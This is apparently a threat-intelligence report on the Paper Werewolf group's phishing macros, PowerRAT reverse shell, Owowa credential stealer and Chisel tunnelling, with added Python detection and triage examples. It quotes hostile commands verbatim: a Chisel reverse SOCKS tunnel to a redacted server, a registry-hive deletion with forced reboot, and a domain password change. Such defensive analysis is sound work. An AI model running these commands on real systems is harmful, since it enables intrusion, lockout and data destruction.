Summary: The Paper Werewolf threat actor utilizes malicious Microsoft Word documents with macros to execute attacks, often employing the Gophish framework for phishing campaigns. This sophisticated method involves encrypted payloads and various tactics for persistence and command execution.
Threat Actor: Paper Werewolf
Victim: Various organizations
Key Points:
- Malicious Word documents are distributed via phishing emails, prompting victims to enable macros.
- The payload is encrypted and decrypted using special character replacements, leading to the execution of a PowerShell script.
- Persistence is achieved by writing the path of the malicious HTA file into the Windows registry.
- The threat actor employs environment variables to conceal malicious programs and monitor document openings.
- Advanced techniques include using a malicious IIS module to intercept credentials and creating redundant access channels to the compromised infrastructure.
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
Notably, the adversaries often use the open-source Gophish framework to run their mailings; the framework is designed for testing how susceptible an organization is to phishing.

Example of a phishing email sent by the attackers

Link pointing to the use of Gophish
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
Because the document content is encrypted and therefore unreadable, the victim is prompted to enable macros to view it.

Encrypted content of a malicious document
Once the victim allows macros, the document content is decrypted.

Decrypted content of a malicious document
The document is decrypted by replacing special characters with respective Russian letters.

Document decryption
The search for the payload within the document starts after the DigitalRSASignature keystring. The payload is Base64-encoded and consists of two parts divided by the CHECKSUM string.

Encrypted payload
The macro decrypts the payload and writes it into two files:
- %USERPROFILE%\UserCache.ini (PowerShell script)
- %USERPROFILE%\UserCache.ini.hta (HTA)
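The carving steps described above (find the keystring, split the Base64 payload on the separator, decode each half into its file) are straightforward to reproduce in a triage script. The following is an added example, not code from the report or from the threat actor's macro: the character-substitution table is constructed for illustration because the report does not give the real mapping, and it assumes the Base64 payload ends at the first character outside the Base64 alphabet.

```python
import base64
import re

# Markers named in the report: the payload follows the DigitalRSASignature
# keystring and its two Base64 parts are separated by the CHECKSUM string.
KEYSTRING = "DigitalRSASignature"
SEPARATOR = "CHECKSUM"

# Constructed substitution table: the real mapping from special characters to
# Russian letters is not given in the report, so this one is an illustration only.
CONSTRUCTED_MAP = str.maketrans({"@": "а", "#": "б", "$": "в", "%": "г"})


def decode_document_text(text: str, table=CONSTRUCTED_MAP) -> str:
    """Undo the character substitution that hides the decoy text."""
    return text.translate(table)


_B64_RUN = re.compile(r"[A-Za-z0-9+/=\r\n]+")


def _b64_run(s: str) -> bytes:
    """Decode the leading run of Base64 characters (line breaks allowed).
    Assumption: the payload ends at the first character outside the Base64 alphabet."""
    m = _B64_RUN.match(s.lstrip())
    if not m:
        raise ValueError("no Base64 data found")
    return base64.b64decode(re.sub(r"\s+", "", m.group(0)))


def extract_payload(document_text: str) -> tuple[bytes, bytes]:
    """Return (UserCache.ini script, UserCache.ini.hta) carved from the document body."""
    idx = document_text.find(KEYSTRING)
    if idx < 0:
        raise ValueError("keystring not found")
    blob = document_text[idx + len(KEYSTRING):]
    first, sep, second = blob.partition(SEPARATOR)
    if not sep:
        raise ValueError("separator not found")
    return _b64_run(first), _b64_run(second)


# Constructed sample document body; the embedded scripts are harmless placeholders.
SAMPLE_PS1 = b"Write-Host 'constructed PowerShell part'"
SAMPLE_HTA = b"<html><script language='VBScript'>' constructed HTA part</script></html>"
SAMPLE_DOC = (
    "@#$% decoy text\n"
    + KEYSTRING + "\n" + base64.b64encode(SAMPLE_PS1).decode() + "\n"
    + SEPARATOR + "\n" + base64.b64encode(SAMPLE_HTA).decode() + "\n"
    + "<end of constructed sample>"
)

if __name__ == "__main__":
    ps1, hta = extract_payload(SAMPLE_DOC)
    print(decode_document_text("@#$%"))
    print(ps1.decode())
    print(hta.decode())
```

The extracted bytes are written to disk only for static analysis; nothing here executes them, which is the point of carving the two stages out of the document instead of letting the macro do it.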
To gain persistence on the compromised system, the path to UserCache.ini.hta is written into the following registry value:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
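Writes to the Windows\Load value are rare in legitimate software, so the persistence step above is a good detection anchor. The following is an added example, not code from the report: it runs a simple rule over registry value-set events (constructed here as dicts shaped like Sysmon Event ID 13 TargetObject/Details fields, not real telemetry) and explains why each hit was flagged.

```python
import re

# Registry value named in the report as the persistence location (any hive prefix).
LOAD_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load$", re.IGNORECASE
)

# File types that a script host would run from the Load value.
SCRIPT_HOST_EXT = (".hta", ".js", ".vbs", ".ps1", ".wsf")

# Constructed registry value-set events, shaped like Sysmon Event ID 13
# (RegistryEvent, Value Set) fields; none of these are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     "Details": r"C:\Users\jdoe\UserCache.ini.hta"},
    {"Image": r"C:\Program Files\Example\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Example",
     "Details": r"C:\Program Files\Example\agent.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     "Details": r"C:\Users\jdoe\AppData\Local\Temp\update.hta"},
]


def classify_load_write(event: dict):
    """Return a finding dict when the event sets the Windows\\Load value, else None."""
    if not LOAD_VALUE_RE.search(event.get("TargetObject", "")):
        return None
    path = event.get("Details", "")
    reasons = ["write to Windows\\Load value (rarely used by legitimate software)"]
    if path.lower().endswith(SCRIPT_HOST_EXT):
        reasons.append("payload is a script-host file")
    if path.lower().endswith("usercache.ini.hta"):
        reasons.append("file name matches the Paper Werewolf HTA")
    return {
        "image": event.get("Image"),
        "target": event["TargetObject"],
        "payload": path,
        "reasons": reasons,
    }


def find_load_persistence(events) -> list:
    """All events that set the Load value, each with its list of reasons."""
    return [finding for finding in map(classify_load_write, events) if finding]


if __name__ == "__main__":
    for hit in find_load_persistence(SAMPLE_EVENTS):
        print(hit["payload"], "->", "; ".join(hit["reasons"]))
```

The first reason alone is enough to raise an alert; the extra reasons only raise the priority, so a renamed HTA under a different path is still caught.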
To conceal the malicious programs on the compromised system, the threat actor uses environment variables:
- AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted]
- ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted]
- VB=VBScript
- AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%\UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%\UserCache.ini.
The encrypted content of UserCache.ini is a reverse shell, a PowerShell script known as PowerRAT, which:
- sets the Hidden attribute on the UserCache.ini and UserCache.ini.hta files
- calls the server hxxp://[redacted]:80/api/texts/<victim_id> for commands, where victim_id stands for [computer name]_[username]_[serial number of the system disk]. These are XML commands with the attributes below:
  - CountRuns, a command run counter
  - Interval, a command interval in minutes
  - Module, a Base64-encoded command (a PowerShell script)
- runs the command received from the server, which is launched through Invoke-Expression
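The beacon URL and the XML command format above are both useful to defenders: the URL shape can be hunted in proxy logs, and captured command documents can be decoded offline for analysis. The following is an added example, not code from the report or from PowerRAT: the XML element names (commands, command) are assumptions because the report only names the attributes, the Base64 payload is assumed to be UTF-8 text, and the proxy log lines are constructed.

```python
import base64
import re
import xml.etree.ElementTree as ET  # prefer defusedxml for untrusted captures

# Beacon URL shape from the report: /api/texts/<computer>_<user>_<disk serial>.
# Assumption: the computer name and serial contain only letters, digits and
# hyphens, and the username contains no underscore.
VICTIM_URL_RE = re.compile(r"/api/texts/([A-Za-z0-9-]+)_([^/\s_]+)_([A-Za-z0-9-]+)")

# Constructed command document; element names are assumptions, attribute
# names are the ones given in the report. The modules are harmless samples.
SAMPLE_COMMAND_XML = """<?xml version="1.0"?>
<commands>
  <command CountRuns="1" Interval="30" Module="{m1}"/>
  <command CountRuns="3" Interval="5" Module="{m2}"/>
</commands>
""".format(
    m1=base64.b64encode(b"Get-Process | Select-Object -First 5").decode(),
    m2=base64.b64encode(b"whoami").decode(),
)

# Constructed proxy log lines (203.0.113.0/24 is a documentation range).
SAMPLE_PROXY_LOG = [
    "2024-03-01T10:00:00Z 10.0.0.5 GET http://203.0.113.10:80/api/texts/WS-0421_jdoe_A1B2-C3D4 200",
    "2024-03-01T10:00:03Z 10.0.0.7 GET http://intranet.example/api/v1/status 200",
]


def parse_commands(xml_text: str) -> list:
    """Decode every element carrying a Module attribute into a dict for analysis.
    The decoded module is returned as text and never executed."""
    root = ET.fromstring(xml_text)
    out = []
    for el in root.iter():
        if "Module" not in el.attrib:
            continue
        out.append({
            "count_runs": int(el.attrib.get("CountRuns", "0")),
            "interval_min": int(el.attrib.get("Interval", "0")),
            "module": base64.b64decode(el.attrib["Module"]).decode("utf-8", "replace"),
        })
    return out


def find_beacons(lines) -> list:
    """Proxy log lines whose URL matches the PowerRAT beacon shape, with the id split out."""
    hits = []
    for line in lines:
        m = VICTIM_URL_RE.search(line)
        if m:
            hits.append({"computer": m.group(1), "user": m.group(2),
                         "disk_serial": m.group(3), "line": line})
    return hits


if __name__ == "__main__":
    for cmd in parse_commands(SAMPLE_COMMAND_XML):
        print(cmd)
    for hit in find_beacons(SAMPLE_PROXY_LOG):
        print(hit["computer"], hit["user"], hit["disk_serial"])
```

The victim_id embeds the host name and username in clear text, so a single proxy hit names the affected workstation and account without any host-side collection.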
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document. The decoy is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Freyja.
The threat actor's arsenal also includes Owowa, a malicious IIS module that enables them to retrieve credentials during user authorization in the Outlook Web Access (OWA) service. The retrieved data is stored in memory in a HashSet.

Example of data intercepted by Owowa
One of the Owowa modules returns a Base64-encoded dataset when the request header contains the username ZaDS0tojX0VDh82, and clears the content of the decrypted dataset and returns an RSA-encrypted Ok string when the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
They probably use PsExec to run commands on remote systems, in particular to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'
To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
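The command lines quoted in this section (the Chisel reverse SOCKS client, the hive deletion with forced reboot, and the domain password change) are distinctive enough to turn into process-creation detections. The following is an added example, not code from the report: the rules are derived only from the command lines shown above, and the sample command lines are constructed (198.51.100.0/24 is a documentation range). Note that the rules match on the exact shapes quoted on the page, so the deletion rule fires only on a root hive (SYSTEM or SOFTWARE) and the password rule only when both a username and a password are supplied.

```python
import re

# Each rule is (name, regex), derived from the command lines quoted in the report.
RULES = [
    # reg delete of a whole root hive (HKLM\SYSTEM or HKLM\SOFTWARE) with /f
    ("hive_deletion", re.compile(
        r'\breg(?:\.exe)?\s+delete\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(?:SYSTEM|SOFTWARE)"?\s+/f\b',
        re.IGNORECASE)),
    # shutdown with both /r (reboot) and /f (force) anywhere on the line
    ("forced_reboot", re.compile(
        r"\bshutdown(?:\.exe)?\b(?=.*\s/r\b)(?=.*\s/f\b)", re.IGNORECASE)),
    # net user <name> <password> /domain: a password change, not a query
    ("domain_password_change", re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/domain\b", re.IGNORECASE)),
    # Chisel client asked to open a reverse SOCKS tunnel
    ("chisel_reverse_socks", re.compile(r"\bclient\b.*\bR:socks\b", re.IGNORECASE)),
]

# Constructed process command lines: the first, second and fourth mirror the
# report's quoted commands, the third and fifth are benign look-alikes.
SAMPLE_CMDLINES = [
    r"cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f "
    r"&& reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'",
    "net user alice NewP@ss123 /domain",
    "net user alice /domain",
    "mastc.exe client --tls-skip-verify -v https://198.51.100.20:49611 R:socks",
    r"reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion",
]


def match_rules(cmdline: str) -> list:
    """Names of all rules that fire on one command line, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines) -> list:
    """(command line, matched rule names) for every line that fires at least one rule."""
    results = []
    for cmdline in cmdlines:
        names = match_rules(cmdline)
        if names:
            results.append((cmdline, names))
    return results


if __name__ == "__main__":
    for cmdline, names in triage(SAMPLE_CMDLINES):
        print(", ".join(names), "<-", cmdline)
```

Because the report ties these commands to PsExec, correlating a hit with a preceding remote service installation on the same host raises confidence further.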